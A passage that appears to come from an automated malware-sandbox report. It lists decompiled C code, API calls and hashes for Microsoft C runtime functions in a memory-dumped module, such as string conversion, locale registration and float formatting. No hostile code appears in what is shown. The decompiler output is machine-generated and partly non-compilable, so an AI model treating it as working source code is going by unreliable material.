Part of subcall function 6D46161C: std::_Lockit::_Lockit.LIBCPMT ref: 6D46162D
Part of subcall function 6D46161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6D461647

numpunct.LIBCPMT ref: 6D48A33C
std::_Facet_Register.LIBCPMT ref: 6D48A353
std::_Lockit::~_Lockit.LIBCPMT ref: 6D48A373
__CxxThrowException@8.LIBVCRUNTIME ref: 6D48A391

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrownumpunct
String ID:
API String ID: 2509942033-0
Opcode ID: 5761a842eba435c2182e6ce2394eee20bf438fb82286629696cc5987ef5fa6df
Instruction ID: abced2d4da36ca310a4813956fb5df31c093eb062dd35b70daf8e60aa874baf9
Opcode Fuzzy Hash: 5761a842eba435c2182e6ce2394eee20bf438fb82286629696cc5987ef5fa6df
Instruction Fuzzy Hash: 5611E0758082299BCF00EBA4C841FEDB7B5AF90314F2A400CD611A7392DFB4EE0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D621F, Relevance: 9.2, APIs: 6, Instructions: 216
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6D4D621F(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
				signed int _v8;
				int _v12;
				void* _v24;
				void* __esi;
				signed int _t49;
				signed int _t54;
				int _t58;
				signed int _t60;
				short* _t62;
				signed int _t66;
				short* _t70;
				int _t71;
				int _t78;
				short* _t81;
				signed int _t87;
				signed int _t90;
				void* _t95;
				int _t97;
				short* _t100;
				int _t102;
				void* _t103;
				signed int _t105;
				short* _t106;
				void* _t109;

				_push(__ecx);
				_push(__ecx);
				_t49 =  *0x6d54506c; // 0xff2bc58a
				_v8 = _t49 ^ _t105;
				_t102 = _a20;
				if(_t102 > 0) {
					_t78 = E6D4C6BDB(_a16, _t102);
					_t109 = _t78 - _t102;
					_t4 = _t78 + 1; // 0x1
					_t102 = _t4;
					if(_t109 >= 0) {
						_t102 = _t78;
					}
				}
				_t97 = _a32;
				if(_t97 == 0) {
					_t97 =  *( *_a4 + 8);
					_a32 = _t97;
				}
				_t54 = MultiByteToWideChar(_t97, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t102, 0, 0);
				_v12 = _t54;
				if(_t54 == 0) {
					L38:
					_pop(_t103);
					return E6D49F8A5(_v8 ^ _t105, _t95, _t103);
				} else {
					_t95 = _t54 + _t54;
					_t85 = _t95 + 8;
					asm("sbb eax, eax");
					if((_t95 + 0x00000008 & _t54) == 0) {
						_t81 = 0;
						__eflags = 0;
						L14:
						if(_t81 == 0) {
							L36:
							_t104 = 0;
							L37:
							E6D48DEE1(_t81);
							goto L38;
						}
						_t58 = MultiByteToWideChar(_t97, 1, _a16, _t102, _t81, _v12);
						_t120 = _t58;
						if(_t58 == 0) {
							goto L36;
						}
						_t99 = _v12;
						_t60 = E6D4D4640(_t85, _t120, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0);
						_t104 = _t60;
						if(_t104 == 0) {
							goto L36;
						}
						if((_a12 & 0x00000400) == 0) {
							_t95 = _t104 + _t104;
							_t87 = _t95 + 8;
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							__eflags = _t87 & _t60;
							if((_t87 & _t60) == 0) {
								_t100 = 0;
								__eflags = 0;
								L30:
								__eflags = _t100;
								if(__eflags == 0) {
									L35:
									E6D48DEE1(_t100);
									goto L36;
								}
								_t62 = E6D4D4640(_t87, __eflags, _a8, _a12, _t81, _v12, _t100, _t104, 0, 0, 0);
								__eflags = _t62;
								if(_t62 == 0) {
									goto L35;
								}
								_push(0);
								_push(0);
								__eflags = _a28;
								if(_a28 != 0) {
									_push(_a28);
									_push(_a24);
								} else {
									_push(0);
									_push(0);
								}
								_t104 = WideCharToMultiByte(_a32, 0, _t100, _t104, ??, ??, ??, ??);
								__eflags = _t104;
								if(_t104 != 0) {
									E6D48DEE1(_t100);
									goto L37;
								} else {
									goto L35;
								}
							}
							_t90 = _t95 + 8;
							__eflags = _t95 - _t90;
							asm("sbb eax, eax");
							_t66 = _t60 & _t90;
							_t87 = _t95 + 8;
							__eflags = _t66 - 0x400;
							if(_t66 > 0x400) {
								__eflags = _t95 - _t87;
								asm("sbb eax, eax");
								_t100 = E6D4CF26D(_t87, _t66 & _t87);
								_pop(_t87);
								__eflags = _t100;
								if(_t100 == 0) {
									goto L35;
								}
								 *_t100 = 0xdddd;
								L28:
								_t100 =  &(_t100[4]);
								goto L30;
							}
							__eflags = _t95 - _t87;
							asm("sbb eax, eax");
							E6D4A01B0();
							_t100 = _t106;
							__eflags = _t100;
							if(_t100 == 0) {
								goto L35;
							}
							 *_t100 = 0xcccc;
							goto L28;
						}
						_t70 = _a28;
						if(_t70 == 0) {
							goto L37;
						}
						_t124 = _t104 - _t70;
						if(_t104 > _t70) {
							goto L36;
						}
						_t71 = E6D4D4640(0, _t124, _a8, _a12, _t81, _t99, _a24, _t70, 0, 0, 0);
						_t104 = _t71;
						if(_t71 != 0) {
							goto L37;
						}
						goto L36;
					}
					asm("sbb eax, eax");
					_t72 = _t54 & _t95 + 0x00000008;
					_t85 = _t95 + 8;
					if((_t54 & _t95 + 0x00000008) > 0x400) {
						__eflags = _t95 - _t85;
						asm("sbb eax, eax");
						_t81 = E6D4CF26D(_t85, _t72 & _t85);
						_pop(_t85);
						__eflags = _t81;
						if(__eflags == 0) {
							goto L36;
						}
						 *_t81 = 0xdddd;
						L12:
						_t81 =  &(_t81[4]);
						goto L14;
					}
					asm("sbb eax, eax");
					E6D4A01B0();
					_t81 = _t106;
					if(_t81 == 0) {
						goto L36;
					}
					 *_t81 = 0xcccc;
					goto L12;
				}
			}

0x6d4d6224
0x6d4d6225
0x6d4d6226
0x6d4d622d
0x6d4d6232
0x6d4d6238
0x6d4d623e
0x6d4d6244
0x6d4d6247
0x6d4d6247
0x6d4d624a
0x6d4d624c
0x6d4d624c
0x6d4d624a
0x6d4d624e
0x6d4d6253
0x6d4d625a
0x6d4d625d
0x6d4d625d
0x6d4d6279
0x6d4d627f
0x6d4d6284
0x6d4d6417
0x6d4d641b
0x6d4d642a
0x6d4d628a
0x6d4d628a
0x6d4d628d
0x6d4d6292
0x6d4d6296
0x6d4d62ea
0x6d4d62ea
0x6d4d62ec
0x6d4d62ee
0x6d4d640c
0x6d4d640c
0x6d4d640e
0x6d4d640f
0x00000000
0x6d4d6415
0x6d4d62ff
0x6d4d6305
0x6d4d6307
0x00000000
0x00000000
0x6d4d630d
0x6d4d631f
0x6d4d6324
0x6d4d6328
0x00000000
0x00000000
0x6d4d6335
0x6d4d636f
0x6d4d6372
0x6d4d6375
0x6d4d6377
0x6d4d6379
0x6d4d637b
0x6d4d63c7
0x6d4d63c7
0x6d4d63c9
0x6d4d63c9
0x6d4d63cb
0x6d4d6405
0x6d4d6406
0x00000000
0x6d4d640b
0x6d4d63df
0x6d4d63e4
0x6d4d63e6
0x00000000
0x00000000
0x6d4d63ea
0x6d4d63eb
0x6d4d63ec
0x6d4d63ef
0x6d4d642b
0x6d4d642e
0x6d4d63f1
0x6d4d63f1
0x6d4d63f2
0x6d4d63f2
0x6d4d63ff
0x6d4d6401
0x6d4d6403
0x6d4d6434
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4d6403
0x6d4d637d
0x6d4d6380
0x6d4d6382
0x6d4d6384
0x6d4d6386
0x6d4d6389
0x6d4d638e
0x6d4d63a9
0x6d4d63ab
0x6d4d63b5
0x6d4d63b7
0x6d4d63b8
0x6d4d63ba
0x00000000
0x00000000
0x6d4d63bc
0x6d4d63c2
0x6d4d63c2
0x00000000
0x6d4d63c2
0x6d4d6390
0x6d4d6392
0x6d4d6396
0x6d4d639b
0x6d4d639d
0x6d4d639f
0x00000000
0x00000000
0x6d4d63a1
0x00000000
0x6d4d63a1
0x6d4d6337
0x6d4d633c
0x00000000
0x00000000
0x6d4d6342
0x6d4d6344
0x00000000
0x00000000
0x6d4d635b
0x6d4d6360
0x6d4d6364
0x00000000
0x00000000
0x00000000
0x6d4d636a
0x6d4d629d
0x6d4d629f
0x6d4d62a1
0x6d4d62a9
0x6d4d62c8
0x6d4d62ca
0x6d4d62d4
0x6d4d62d6
0x6d4d62d7
0x6d4d62d9
0x00000000
0x00000000
0x6d4d62df
0x6d4d62e5
0x6d4d62e5
0x00000000
0x6d4d62e5
0x6d4d62ad
0x6d4d62b1
0x6d4d62b6
0x6d4d62ba
0x00000000
0x00000000
0x6d4d62c0
0x00000000
0x6d4d62c0

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6D4BF290,6D4BF290,?,?,?,6D4D6470,00000001,00000001,C5E85006), ref: 6D4D6279
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6D4D6470,00000001,00000001,C5E85006,?,?,?), ref: 6D4D62FF
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,C5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6D4D63F9
__freea.LIBCMT ref: 6D4D6406

Part of subcall function 6D4CF26D: RtlAllocateHeap.NTDLL(00000000,6D4875D9,00000000,?,6D4A0F8B,00000002,00000000,?,?,?,6D461298,6D4875D9,00000004,00000000,00000000,00000000), ref: 6D4CF29F

__freea.LIBCMT ref: 6D4D640F
__freea.LIBCMT ref: 6D4D6434

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 633c004ac5ebef5ceeeeb8c3282b626689a49b25bf922258871c586eacb444ad
Instruction ID: 3173b6be8ca60f6da65b741c7f917a018fba417df5609d4eacd24428755599cc
Opcode Fuzzy Hash: 633c004ac5ebef5ceeeeb8c3282b626689a49b25bf922258871c586eacb444ad
Instruction Fuzzy Hash: 3B51F07261022AABEB158F64CCA0FBB77A9EF44750F26422DFD14E6285EB34DC5186D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4C23DD, Relevance: 9.2, APIs: 6, Instructions: 200
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6D4C23DD(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				char _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				char _v48;
				void* __ecx;
				signed int _t67;
				signed int _t70;
				signed int _t71;
				signed int _t75;
				intOrPtr _t76;
				signed int _t79;
				signed int _t86;
				intOrPtr _t88;
				signed int _t99;
				void* _t101;
				void* _t103;
				void* _t108;
				signed int _t112;
				signed int _t113;
				signed int _t116;
				void* _t120;
				signed int _t123;
				signed int _t125;
				intOrPtr _t126;
				signed int _t128;
				intOrPtr _t130;
				signed int _t131;
				void* _t135;
				void* _t136;
				void* _t138;

				_t120 = __edx;
				_t97 = __ebx;
				_push(_t101);
				if(_a8 != 0) {
					_push(__esi);
					_push(__edi);
					_t123 = 0;
					_t67 = E6D4D4E0A( &_v8, 0, 0, _a8, 0x7fffffff);
					_t136 = _t135 + 0x14;
					__eflags = _t67;
					if(_t67 == 0) {
						L5:
						_t128 = E6D4CC7EF(_t101, _v8, 2);
						_pop(_t103);
						__eflags = _t128;
						if(_t128 == 0) {
							L11:
							E6D4CCBD3(_t128);
							_t70 = _t123;
							goto L12;
						} else {
							_t71 = E6D4D4E0A(_t123, _t128, _v8, _a8, 0xffffffff);
							_t136 = _t136 + 0x14;
							__eflags = _t71;
							if(_t71 == 0) {
								_t123 = E6D4CE486(_t97, _t103, _a4, _t128);
								goto L11;
							} else {
								__eflags = _t71 - 0x16;
								if(_t71 == 0x16) {
									goto L13;
								} else {
									__eflags = _t71 - 0x22;
									if(_t71 != 0x22) {
										goto L11;
									} else {
										goto L13;
									}
								}
							}
						}
					} else {
						__eflags = _t67 - 0x16;
						if(_t67 == 0x16) {
							L13:
							_push(_t123);
							_push(_t123);
							_push(_t123);
							_push(_t123);
							E6D4C2188();
							asm("int3");
							E6D4A0990(_t97, _t123, 0x6d542bc0, 0x1c);
							_t130 = _a4;
							_t75 = E6D4C23DD(_t97, _t120, _t123, _t130, _t130, _a8);
							_t108 = _t123;
							_t125 = _t75;
							__eflags = _t125;
							if(_t125 != 0) {
								_t76 = E6D4CD5FF(_t97, _t108, _t120);
								_v40 = _t76;
								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
								_t110 =  *((intOrPtr*)(_t76 + 0x48));
								_v44 =  *((intOrPtr*)(_t76 + 0x48));
								_v32 = 0;
								_t79 = E6D4D50ED( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
								_t138 = _t136 + 0x18;
								__eflags = _t79;
								if(_t79 == 0) {
									L22:
									_t99 = E6D4CF26D(_t110, _v32 + 4);
									__eflags = _t99;
									if(_t99 == 0) {
										goto L15;
									} else {
										_t20 = _t99 + 4; // 0x4
										_v36 = _t20;
										_t110 =  &_v48;
										_t125 = 0;
										_t86 = E6D4D50ED( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
										_t138 = _t138 + 0x18;
										__eflags = _t86;
										if(_t86 == 0) {
											L29:
											_t126 = _v48;
											E6D4C2361(4);
											_pop(_t112);
											_v8 = _v8 & 0x00000000;
											_t131 = _t130 + _t130;
											_t113 = _t112 | 0xffffffff;
											__eflags =  *(_t126 + 0x24 + _t131 * 8);
											if(__eflags != 0) {
												asm("lock xadd [edx], eax");
												if(__eflags == 0) {
													E6D4CCBD3( *(_t126 + 0x24 + _t131 * 8));
													_pop(_t116);
													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
													_t113 = _t116 | 0xffffffff;
													__eflags = _t113;
												}
											}
											_t88 = _v40;
											__eflags =  *(_t88 + 0x350) & 0x00000002;
											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
												__eflags =  *0x6d5452ec & 0x00000001;
												if(( *0x6d5452ec & 0x00000001) == 0) {
													__eflags =  *(_t126 + 0x24 + _t131 * 8);
													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
														asm("lock xadd [eax], ecx");
														__eflags = _t113 == 1;
														if(_t113 == 1) {
															E6D4CCBD3( *(_t126 + 0x24 + _t131 * 8));
															_t51 = _t126 + 0x24 + _t131 * 8;
															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
															__eflags =  *_t51;
														}
													}
												}
											}
											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
											 *(_t126 + 0x24 + _t131 * 8) = _t99;
											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
											_v8 = 0xfffffffe;
											E6D4C25CE();
										} else {
											__eflags = _t86 - 0x16;
											if(_t86 == 0x16) {
												L26:
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												_push(_t125);
												goto L20;
											} else {
												__eflags = _t86 - 0x22;
												if(_t86 != 0x22) {
													__eflags = _t86;
													if(_t86 == 0) {
														goto L29;
													} else {
														E6D4CCBD3(_t99);
														goto L15;
													}
												} else {
													goto L26;
												}
											}
										}
									}
								} else {
									__eflags = _t79 - 0x16;
									if(_t79 == 0x16) {
										L19:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										L20:
										_t79 = E6D4C2188();
									} else {
										__eflags = _t79 - 0x22;
										if(_t79 == 0x22) {
											goto L19;
										}
									}
									__eflags = _t79;
									if(_t79 != 0) {
										goto L15;
									} else {
										goto L22;
									}
								}
							} else {
								L15:
							}
							return E6D4A09D6();
						} else {
							__eflags = _t67 - 0x22;
							if(_t67 == 0x22) {
								goto L13;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t70 = E6D4CE486(__ebx, _t101, _a4, 0);
					L12:
					return _t70;
				}
			}

0x6d4c23dd
0x6d4c23dd
0x6d4c23e2
0x6d4c23e7
0x6d4c23f7
0x6d4c23f8
0x6d4c2401
0x6d4c2409
0x6d4c240e
0x6d4c2411
0x6d4c2413
0x6d4c241f
0x6d4c2429
0x6d4c242c
0x6d4c242d
0x6d4c242f
0x6d4c2460
0x6d4c2461
0x6d4c2467
0x00000000
0x6d4c2431
0x6d4c243b
0x6d4c2440
0x6d4c2443
0x6d4c2445
0x6d4c245e
0x00000000
0x6d4c2447
0x6d4c2447
0x6d4c244a
0x00000000
0x6d4c244c
0x6d4c244c
0x6d4c244f
0x00000000
0x6d4c2451
0x00000000
0x6d4c2451
0x6d4c244f
0x6d4c244a
0x6d4c2445
0x6d4c2415
0x6d4c2415
0x6d4c2418
0x6d4c246f
0x6d4c246f
0x6d4c2470
0x6d4c2471
0x6d4c2472
0x6d4c2474
0x6d4c2479
0x6d4c2481
0x6d4c2489
0x6d4c248d
0x6d4c2493
0x6d4c2494
0x6d4c2496
0x6d4c2498
0x6d4c24a1
0x6d4c24a6
0x6d4c24ac
0x6d4c24af
0x6d4c24b2
0x6d4c24b7
0x6d4c24c6
0x6d4c24cb
0x6d4c24ce
0x6d4c24d0
0x6d4c24ea
0x6d4c24f7
0x6d4c24f9
0x6d4c24fb
0x00000000
0x6d4c24fd
0x6d4c24fd
0x6d4c2500
0x6d4c2503
0x6d4c250e
0x6d4c2511
0x6d4c2516
0x6d4c2519
0x6d4c251b
0x6d4c253e
0x6d4c253e
0x6d4c2543
0x6d4c2548
0x6d4c2549
0x6d4c254d
0x6d4c2553
0x6d4c2556
0x6d4c2558
0x6d4c255c
0x6d4c2560
0x6d4c2566
0x6d4c256b
0x6d4c256c
0x6d4c2571
0x6d4c2571
0x6d4c2571
0x6d4c2560
0x6d4c2574
0x6d4c2577
0x6d4c257e
0x6d4c2580
0x6d4c2587
0x6d4c258d
0x6d4c258f
0x6d4c2591
0x6d4c2595
0x6d4c2596
0x6d4c259c
0x6d4c25a2
0x6d4c25a2
0x6d4c25a2
0x6d4c25a2
0x6d4c2596
0x6d4c258f
0x6d4c2587
0x6d4c25aa
0x6d4c25ac
0x6d4c25b3
0x6d4c25b7
0x6d4c25be
0x6d4c251d
0x6d4c251d
0x6d4c2520
0x6d4c2527
0x6d4c2527
0x6d4c2528
0x6d4c2529
0x6d4c252a
0x6d4c252b
0x00000000
0x6d4c2522
0x6d4c2522
0x6d4c2525
0x6d4c252e
0x6d4c2530
0x00000000
0x6d4c2532
0x6d4c2533
0x00000000
0x6d4c2538
0x00000000
0x00000000
0x00000000
0x6d4c2525
0x6d4c2520
0x6d4c251b
0x6d4c24d2
0x6d4c24d2
0x6d4c24d5
0x6d4c24dc
0x6d4c24dc
0x6d4c24dd
0x6d4c24de
0x6d4c24df
0x6d4c24e0
0x6d4c24e1
0x6d4c24e1
0x6d4c24d7
0x6d4c24d7
0x6d4c24da
0x00000000
0x00000000
0x6d4c24da
0x6d4c24e6
0x6d4c24e8
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4c24e8
0x6d4c249a
0x6d4c249a
0x6d4c249a
0x6d4c25ca
0x6d4c241a
0x6d4c241a
0x6d4c241d
0x00000000
0x00000000
0x00000000
0x00000000
0x6d4c241d
0x6d4c2418
0x6d4c23e9
0x6d4c23ee
0x6d4c246b
0x6d4c246e
0x6d4c246e

APIs

__cftoe.LIBCMT ref: 6D4C2409
__cftoe.LIBCMT ref: 6D4C243B

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: afa87ecfe30d726ee5af3b45d3951c80bad4271df83f789e5394edf2f5901e3c
Instruction ID: b08638d4b50ffa15c07c73a2851cb4fd18f26176eb6522c9bf81434c234a5827
Opcode Fuzzy Hash: afa87ecfe30d726ee5af3b45d3951c80bad4271df83f789e5394edf2f5901e3c
Instruction Fuzzy Hash: FF51FE3A904206ABDB35DB688CC0F7E77B9EF49328F21511DE524E6281DF71DD0086A6

Uniqueness

Uniqueness Score: -1.00%

Function 6D4A42C8, Relevance: 9.1, APIs: 6, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6D4A42C8(void* __ecx, void* __edx) {
				void* _t4;
				void* _t11;
				void* _t16;
				long _t26;
				void* _t29;

				if( *0x6d545090 != 0xffffffff) {
					_t26 = GetLastError();
					_t11 = E6D4A56A9(__eflags,  *0x6d545090);
					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6D4A56E4(__eflags,  *0x6d545090, 0xffffffff);
							_pop(_t16);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_push(1);
								_t29 = E6D4AB9EA(_t16);
								__eflags = _t29;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6D4A56E4(__eflags,  *0x6d545090, 0);
								} else {
									__eflags = E6D4A56E4(__eflags,  *0x6d545090, _t29);
									if(__eflags != 0) {
										_t11 = _t29;
										_t29 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								L6D4C1DEB(_t29);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t26);
					return _t11;
				} else {
					return 0;
				}
			}

0x6d4a42cf
0x6d4a42e2
0x6d4a42e9
0x6d4a42ec
0x6d4a42ef
0x6d4a4308
0x6d4a4308
0x6d4a42f1
0x6d4a42f1
0x6d4a42f3
0x6d4a42fd
0x6d4a4303
0x6d4a4304
0x6d4a4306
0x6d4a430d
0x6d4a430f
0x6d4a4316
0x6d4a431a
0x6d4a431c
0x6d4a4330
0x6d4a4330
0x6d4a4339
0x6d4a431e
0x6d4a432c
0x6d4a432e
0x6d4a4342
0x6d4a4344
0x6d4a4344
0x00000000
0x00000000
0x00000000
0x6d4a432e
0x6d4a4347
0x00000000
0x00000000
0x00000000
0x6d4a4306
0x6d4a42f3
0x6d4a434f
0x6d4a4359
0x6d4a42d1
0x6d4a42d3
0x6d4a42d3

APIs

GetLastError.KERNEL32(00000001,?,6D4A3EDB,6D49FA25,6D49FD54,?,6D49FF71,?,00000001,?,?,00000001,?,6D5427E0,0000000C,6D4A006E), ref: 6D4A42D6
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D4A42E4
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D4A42FD
SetLastError.KERNEL32(00000000,6D49FF71,?,00000001,?,?,00000001,?,6D5427E0,0000000C,6D4A006E,?,00000001,?), ref: 6D4A434F

Memory Dump Source

Source File: 00000002.00000002.962212872.000000006D461000.00000020.00020000.sdmp, Offset: 6D460000, based on PE: true

Associated: 00000002.00000002.962205588.000000006D460000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.962266346.000000006D4EA000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.967755490.000000006D545000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967763841.000000006D55C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.967768932.000000006D55D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 71e25ef1253ae4326d843aec082438d6feda889a0f958052d6a3b879616a7c9a
Instruction ID: 8bc95817a677a78d893d09f448f2f3839c5270ee65e09dea72099e92a8e78bff
Opcode Fuzzy Hash: 71e25ef1253ae4326d843aec082438d6feda889a0f958052d6a3b879616a7c9a
Instruction Fuzzy Hash: 3201F13620D3266EAA0466B46C85FBE3774EB273BA33A022EE61C855DCEF114C018284

Uniqueness

Uniqueness Score: -1.00%

Function 6D48F94B, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6D48F94B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t97;
				signed int _t98;
				void* _t110;
				void* _t123;
				void* _t136;
				void* _t149;
				void* _t162;
				signed int _t245;
				signed int _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				void* _t286;

				_t264 = __edx;
				_t203 = __ebx;
				E6D4A00AC(0x6d4e83cf, __ebx, __edi, __esi, 0x14);
				E6D486653(_t286 - 0x14, 0);
				_t273 =  *0x6d546ddc; // 0x0
				 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
				 *(_t286 - 0x10) = _t273;
				_t97 = E6D46161C(0x6d546d88);
				_t206 =  *((intOrPtr*)(_t286 + 8));
				_t98 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t97);
				_t266 = _t98;
				if(_t98 != 0) {
					L5:
					E6D4866BA(_t286 - 0x14);
					return E6D4A0075(_t266);
				} else {
					if(_t273 == 0) {
						_push( *((intOrPtr*)(_t286 + 8)));
						_push(_t286 - 0x10);
						__eflags = E6D491409(__ebx, _t206, __edx, _t266, _t273) - 0xffffffff;
						if(__eflags == 0) {
							E6D461438(_t286 - 0x20);
							E6D4A3D74(_t286 - 0x20, 0x6d543504);
							asm("int3");
							E6D4A00AC(0x6d4e83cf, __ebx, _t266, _t273, 0x14);
							E6D486653(_t286 - 0x14, 0);
							_t274 =  *0x6d546de0; // 0x0
							 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
							 *(_t286 - 0x10) = _t274;
							_t110 = E6D46161C(0x6d546d8c);
							_t213 =  *((intOrPtr*)(_t286 + 8));
							_t267 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t110);
							__eflags = _t267;
							if(_t267 != 0) {
								L12:
								E6D4866BA(_t286 - 0x14);
								return E6D4A0075(_t267);
							} else {
								__eflags = _t274;
								if(_t274 == 0) {
									_push( *((intOrPtr*)(_t286 + 8)));
									_push(_t286 - 0x10);
									__eflags = E6D491471(_t203, _t213, __edx, _t267, _t274) - 0xffffffff;
									if(__eflags == 0) {
										E6D461438(_t286 - 0x20);
										E6D4A3D74(_t286 - 0x20, 0x6d543504);
										asm("int3");
										E6D4A00AC(0x6d4e83cf, _t203, _t267, _t274, 0x14);
										E6D486653(_t286 - 0x14, 0);
										_t275 =  *0x6d546dfc; // 0x0
										 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
										 *(_t286 - 0x10) = _t275;
										_t123 = E6D46161C(0x6d546da8);
										_t220 =  *((intOrPtr*)(_t286 + 8));
										_t268 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t123);
										__eflags = _t268;
										if(_t268 != 0) {
											L19:
											E6D4866BA(_t286 - 0x14);
											return E6D4A0075(_t268);
										} else {
											__eflags = _t275;
											if(_t275 == 0) {
												_push( *((intOrPtr*)(_t286 + 8)));
												_push(_t286 - 0x10);
												__eflags = E6D4914EC(_t203, _t220, __edx, _t268, _t275) - 0xffffffff;
												if(__eflags == 0) {
													E6D461438(_t286 - 0x20);
													E6D4A3D74(_t286 - 0x20, 0x6d543504);
													asm("int3");
													E6D4A00AC(0x6d4e83cf, _t203, _t268, _t275, 0x14);
													E6D486653(_t286 - 0x14, 0);
													_t276 =  *0x6d546dcc; // 0x0
													 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
													 *(_t286 - 0x10) = _t276;
													_t136 = E6D46161C(0x6d546d80);
													_t227 =  *((intOrPtr*)(_t286 + 8));
													_t269 = E6D46171B( *((intOrPtr*)(_t286 + 8)), _t136);
													__eflags = _t269;
													if(_t269 != 0) {
														L26:
														E6D4866BA(_t286 - 0x14);
														return E6D4A0075(_t269);
													} else {
														__eflags = _t276;
														if(_t276 == 0) {
															_push( *((intOrPtr*)(_t286 + 8)));
															_push(_t286 - 0x10);
															__eflags = E6D491558(_t203, _t227, _t264, _t269, _t276) - 0xffffffff;
															if(__eflags == 0) {
																E6D461438(_t286 - 0x20);
																E6D4A3D74(_t286 - 0x20, 0x6d543504);
																asm("int3");
																E6D4A00AC(0x6d4e83cf, _t203, _t269, _t276, 0x14);
																E6D486653(_t286 - 0x14, 0);
																_t277 =  *0x6d546e00; // 0x0
																 *(_t286 - 4) =  *(_t286 - 4) & 0x00000000;
																 *(_t286 - 0x10) = _t277;
																_t149 = E6D46161C(0x6d546dac);
																_t234 =  *((intOrPtr*)(_t286 + 8));
